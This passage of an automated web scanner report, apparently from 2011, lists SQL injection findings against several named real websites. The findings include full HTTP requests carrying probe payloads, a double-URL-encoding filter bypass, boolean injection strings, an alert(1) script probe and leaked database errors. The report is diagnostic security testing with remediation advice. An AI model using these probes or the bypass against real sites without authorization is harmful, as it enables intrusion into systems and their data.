Host:   http://ib.adnxs.com
Path:   /getuid

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the User-Agent HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /getuid HTTP/1.1
Host: ib.adnxs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527
Connection: close
Cookie: anj=Kfu=8fG68%E:3F.0s]#%2L_'x%SEV/i#+L9=FzXN9?TZi)>y1-4(^NfPD+@4+=p-.ut5]P'*l.AkLC:ZoWT8jurJFwtQgyR2#Z@Gma]02msi.X/+T:%u.sH%ptkhWT<T7O/!9fZN1X_94IFwbrUH.AC0A)'9DjhifCjr1a#[FbrxvsnEr]VJ@?3JlsWCTM<[<X>vc9aJjqyKfLgisMsE@+/IU*K*VTJy:P4x>H+=q5PufidQD2]*](K9'9kOYZb; icu=EAAYAA..; uuid2=4760492999213801733; sess=1;

Response 1

HTTP/1.1 500 No url
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sat, 29-Jan-2011 16:46:47 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 16:46:47 GMT; domain=.adnxs.com; HttpOnly
Date: Fri, 28 Jan 2011 16:46:47 GMT
Content-Length: 0
Connection: close

Request 2

GET /getuid HTTP/1.1
Host: ib.adnxs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527%2527
Connection: close
Cookie: anj=Kfu=8fG68%E:3F.0s]#%2L_'x%SEV/i#+L9=FzXN9?TZi)>y1-4(^NfPD+@4+=p-.ut5]P'*l.AkLC:ZoWT8jurJFwtQgyR2#Z@Gma]02msi.X/+T:%u.sH%ptkhWT<T7O/!9fZN1X_94IFwbrUH.AC0A)'9DjhifCjr1a#[FbrxvsnEr]VJ@?3JlsWCTM<[<X>vc9aJjqyKfLgisMsE@+/IU*K*VTJy:P4x>H+=q5PufidQD2]*](K9'9kOYZb; icu=EAAYAA..; uuid2=4760492999213801733; sess=1;

Response 2

HTTP/1.1 302 Moved
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sat, 29-Jan-2011 16:46:47 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 16:46:47 GMT; domain=.adnxs.com; HttpOnly
Location: ...C
Date: Fri, 28 Jan 2011 16:46:47 GMT
Content-Length: 0
Connection: close


1.16. http://it.imlive.com/waccess/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://it.imlive.com
Path:   /waccess/

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /waccess'/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: it.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:25:08 GMT
Connection: close
Content-Length: 63
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

<html><body><h1> HTTP/1.1 New Session Failed</h1></body></html>

Request 2

GET /waccess''/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: it.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:25:08 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: iit=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/
Set-Cookie: ASPSESSIONIDQSQSRBSD=MDONOIMAHFCJJOAEABNJMFBH; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:25:08 GMT
Connection: close
Content-Length: 8441
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...

1.17. http://local.nissanusa.com/zip.aspx [__utmz cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://local.nissanusa.com
Path:   /zip.aspx

Issue detail

The __utmz cookie appears to be vulnerable to SQL injection attacks. The payload " was submitted in the __utmz cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /zip.aspx HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46"; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:53:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:53:06 GMT
Content-Length: 5852
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
</div>
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '27'
    AND a.version = 'en'
    AND ac.category_page='ZPA'
AND' at line 5

1.18. http://local.nissanusa.com/zip.aspx [regionalZipCode parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://local.nissanusa.com
Path:   /zip.aspx

Issue detail

The regionalZipCode parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the regionalZipCode parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the regionalZipCode request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /zip.aspx?regionalZipCode=null%2527&vehicle=versa-hatchback&dcp=zmm.50658498.&dcc=39942763.226884546 HTTP/1.1
Host: local.nissanusa.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_fv=flash%2010; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; dcc=39942763.226884546; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; visitStart=1; s_sq=%5B%5BB%5D%5D; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.2.10.1296235644

Response 1 (redirected)

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 01:44:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 01:44:25 GMT
Connection: close
Content-Length: 86332

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...
32="";

s.eVar48="CrossRegional";
// fire call to omniture
pingOmn();
}

function errorEvent() {
omnFlushObj();
// set variables as required
s.pageName="Regional_Contact_Dealer_"+region+"_Error_FeaLocOffers ";

...[SNIP]...

Request 2

GET /zip.aspx?regionalZipCode=null%2527%2527&vehicle=versa-hatchback&dcp=zmm.50658498.&dcc=39942763.226884546 HTTP/1.1
Host: local.nissanusa.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_fv=flash%2010; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; dcc=39942763.226884546; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; visitStart=1; s_sq=%5B%5BB%5D%5D; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.2.10.1296235644

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 01:44:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 01:44:26 GMT
Connection: close
Content-Length: 16098

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...

1.19. http://local.nissanusa.com/zip.aspx [vehicle parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://local.nissanusa.com
Path:   /zip.aspx

Issue detail

The vehicle parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the vehicle parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /zip.aspx?regionalZipCode=null&vehicle=versa-hatchback'&dcp=zmm.50658498.&dcc=39942763.226884546 HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Fri, 28 Jan 2011 16:59:39 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 28 Jan 2011 16:59:39 GMT
Content-Length: 5818
Connection: close
Set-Cookie: PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
</div>
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '27'
    AND a.version = 'en'
    AND ac.category_page='ZPA'
AND' at line 5

Request 2

GET /zip.aspx?regionalZipCode=null&vehicle=versa-hatchback''&dcp=zmm.50658498.&dcc=39942763.226884546 HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Fri, 28 Jan 2011 16:59:39 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 28 Jan 2011 16:59:39 GMT
Content-Length: 15976
Connection: close
Set-Cookie: PHPSESSID=s9eoga6caogtb5dnhcsqkqej14; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...

1.20. http://nl.imlive.com/waccess/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://nl.imlive.com
Path:   /waccess/

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /waccess'/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: nl.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:25:27 GMT
Connection: close
Content-Length: 63
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

<html><body><h1> HTTP/1.1 New Session Failed</h1></body></html>

Request 2

GET /waccess''/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: nl.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:25:28 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: inl=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/
Set-Cookie: ASPSESSIONIDSQRTQDQC=DLPLFJMAFKGAEJJBLHMDPHAI; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:25:28 GMT
Connection: close
Content-Length: 8441
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...

1.21. http://scores.heraldinteractive.com/aspdata/clients/herald/game.aspx [team parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://scores.heraldinteractive.com
Path:   /aspdata/clients/herald/game.aspx

Issue detail

The team parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the team parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /aspdata/clients/herald/game.aspx?team=028' HTTP/1.1
Host: scores.heraldinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/5.0
Date: Sat, 29 Jan 2011 01:55:09 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8703

<html>
<head>
<title>Unclosed quotation mark before the character string '028''.<br>Line 1: Incorrect syntax near '028''.</title>
<style>
body {font-family:"Verdana";f
...[SNIP]...

1.22. http://scores.heraldinteractive.com/aspdata/clients/herald/nbagame.aspx [team parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://scores.heraldinteractive.com
Path:   /aspdata/clients/herald/nbagame.aspx

Issue detail

The team parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the team parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /aspdata/clients/herald/nbagame.aspx?team=092' HTTP/1.1
Host: scores.heraldinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/5.0
Date: Sat, 29 Jan 2011 01:55:02 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8732

<html>
<head>
<title>Unclosed quotation mark before the character string '092',1'.<br>Line 1: Incorrect syntax near '092',1'.</title>
<style>
body {font-family:"Verdan
...[SNIP]...

Request 2

GET /aspdata/clients/herald/nbagame.aspx?team=092'' HTTP/1.1
Host: scores.heraldinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sat, 29 Jan 2011 01:55:04 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 1245

document.write('<TABLE BORDER="0" CELLPADDING="1" CELLSPACING="2" width="100%"><TR><TH width="40%" class="TSN6" align="left">1/28 10:30 PM ET</th><TH width="10%" class="TSN2" align="center">1</th><TH
...[SNIP]...

1.23. http://scores.heraldinteractive.com/aspdata/clients/herald/nflgame.aspx [team parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://scores.heraldinteractive.com
Path:   /aspdata/clients/herald/nflgame.aspx

Issue detail

The team parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the team parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /aspdata/clients/herald/nflgame.aspx?team=077' HTTP/1.1
Host: scores.heraldinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/5.0
Date: Sat, 29 Jan 2011 01:55:08 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8709

<html>
<head>
<title>Unclosed quotation mark before the character string '077''.<br>Line 1: Incorrect syntax near '077''.</title>
<style>
body {font-family:"Verdana";f
...[SNIP]...

Request 2

GET /aspdata/clients/herald/nflgame.aspx?team=077'' HTTP/1.1
Host: scores.heraldinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sat, 29 Jan 2011 01:55:09 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 1814

document.write('<TABLE BORDER="0" CELLPADDING="1" CELLSPACING="2" width="100%"><tr><TH width="40%" class="TSN6" align="left">Final </th><TH width="10%" align="center" Class="TSN2">1</th><TH width="10%
...[SNIP]...

1.24. http://scores.heraldinteractive.com/aspdata/clients/herald/nhlgame.aspx [team parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://scores.heraldinteractive.com
Path:   /aspdata/clients/herald/nhlgame.aspx

Issue detail

The team parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the team parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /aspdata/clients/herald/nhlgame.aspx?team=121' HTTP/1.1
Host: scores.heraldinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/5.0
Date: Sat, 29 Jan 2011 01:55:17 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8732

<html>
<head>
<title>Unclosed quotation mark before the character string '121',1'.<br>Line 1: Incorrect syntax near '121',1'.</title>
<style>
body {font-family:"Verdan
...[SNIP]...

Request 2

GET /aspdata/clients/herald/nhlgame.aspx?team=121'' HTTP/1.1
Host: scores.heraldinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sat, 29 Jan 2011 01:55:19 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 1659

document.write('<TABLE BORDER="0" CELLPADDING="1" CELLSPACING="2" width="100%"><tr><TH width="40%" class="TSN6" align="left">Final </th><TH width="10%" align="center" Class="TSN2">1</th><TH width="10%
...[SNIP]...

1.25. http://tap.rubiconproject.com/oz/sensor [au cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tap.rubiconproject.com
Path:   /oz/sensor

Issue detail

The au cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the au cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /oz/sensor?p=rubicon&pc=5804/7477&cd=false&xt=17&k=photos:102,5+wrinkle:64,daily+news:64,wrinkle+trick:64,77+hr:64,dallas+mom's:64,mom's+5:64,dallas+local:64,makes+77:64,mom+makes:64,local+mom:64,photo:55,dallas:48,news:42,stars:32,dallas+mom:32,look+phenomenal:32,caught+without:32,without+makeup:32,stars+caught:32,player+news:32,life+style:32,news+front:32,red+carpet:32,daily+new:32,mom+make:32,star:26,2011:24,high+school:24,honored+tradition:24,sundance+film:24,film+festival:24,festival+2011:24,time+honored:24,dalla:24,sunny+socal:24,stars+leave:24,leave+sunny:24,2011+daily:24,new:21,&rd=burp&t=Page+Not+Found HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(1)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GIP9HWY4-MADS-10.208.38.239'%20and%201%3d1--%20; put_1197=3271971346728586924; put_1994=6ch47d7o8wtv; xdp_ti="26 Jan 2011 20:13:41 GMT"; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; khaos=GIPAEQ2D-C-IOYY; ruid=154d290e46adc1d6f373dd09^5^1296224069^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2025=38f8a1ac-1e96-40c8-8d5e-172234bf5f5f; put_1512=4d3702bc-839e-0690-5370-3c19a9561295; put_1430=e6f6dead-6db2-4b47-a015-f587315583eb; put_1902=CfTKz1vxnM4Qo87LXqXVyg71y5oQqc-aCvFBOBEd; put_2081=CA-00000000456885722; cd=false; dq=14|4|10|0; lm="28 Jan 2011 14:48:45 GMT"; put_2101=82d726c3-44ee-407c-85c4-39a0b0fc11ef; rdk15=0; ses15=7477^6; csi15=3174529.js^2^1296226115^1296226129&3187311.js^2^1296226114^1296226127&3173809.js^1^1296224076^1296224076&3178297.js^1^1296224073^1296224073; put_1185=3011330574290390485; rdk=5804/7477; rdk2=0; ses2=7477^6; csi2=3138805.js^2^1296224077^1296226130&3174527.js^2^1296226121^1296226125&3178295.js^1^1296226112^1296226112; put_1986=4760492999213801733; rpb=4214%3D1%264894%3D1%264939%3D1%262399%3D1%263615%3D1%264940%3D1%262372%3D1%263169%3D1%262200%3D1%262374%3D1%265574%3D1%264210%3D1%265328%3D1%264554%3D1%265671%3D1%265852%3D1%264212%3D1%266286%3D1; put_2132=D8DB51BF08484217F5D14AB47F4002AD

Response 1

HTTP/1.1 204 No Content
Date: Fri, 28 Jan 2011 17:02:01 GMT
Server: TRP Apache-Coyote/1.1
